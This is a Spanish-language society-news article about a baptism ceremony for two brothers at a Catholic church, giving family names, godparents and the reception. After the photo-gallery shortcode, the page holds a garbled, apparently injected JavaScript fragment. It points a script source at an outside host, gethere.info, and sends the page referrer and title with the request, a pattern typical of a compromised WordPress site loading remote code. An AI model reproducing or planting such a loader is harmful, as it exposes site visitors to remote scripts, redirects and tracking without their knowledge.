Ceremonia Bautismal de los niños Andre & Alexander Goerne Rodríguez

Ceremonia Bautismal de los niños Andre y Alexander Goerne Rodríguez en la iglesia de San Juan Nepomuceno oficiada por el padre Juan Miguel Garza Zertuche.

Texto & fotos: Francisco Muñiz

 

Para recibir la gracia del Señor por medio del sacramento del bautismo se presentaron los pequeños, Andre y Alexander Goerne Rodríguez, en la iglesia de San Juan Nepomuceno, el sábado 10 de septiembre.

El padre Juan Miguel Garza Zertuche recibió y bendijo a los padres de los niños, Wilhem Goerne y Elizabeth Rodríguez, y a su respectiva madrina; Lorena e Ileana Rodríguez.

Durante la ceremonia bautismal el presbítero invitó a los padrinos y madrinas de los niños a encauzar la formación espiritual de su respectivo ahijado partiendo de los principios que marca la fe católica.

Entre los asistentes a la misa estaban sus abuelitos, además de sus primas y amistades de la familia.

Al concluir la misa los integrantes de la familia Goerne Rodríguez invitaron a sus amigos y familiares al salón de recepciones en el cual se realizo la recepción de tan importante evento.

 

[Best_Wordpress_Gallery id=”117″ gal_title=”Ceremonia Bautismal de los niños Andre y Alexander”]s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

No hay comentarios

Dejar un comentario

Su correo electrónico no será revelado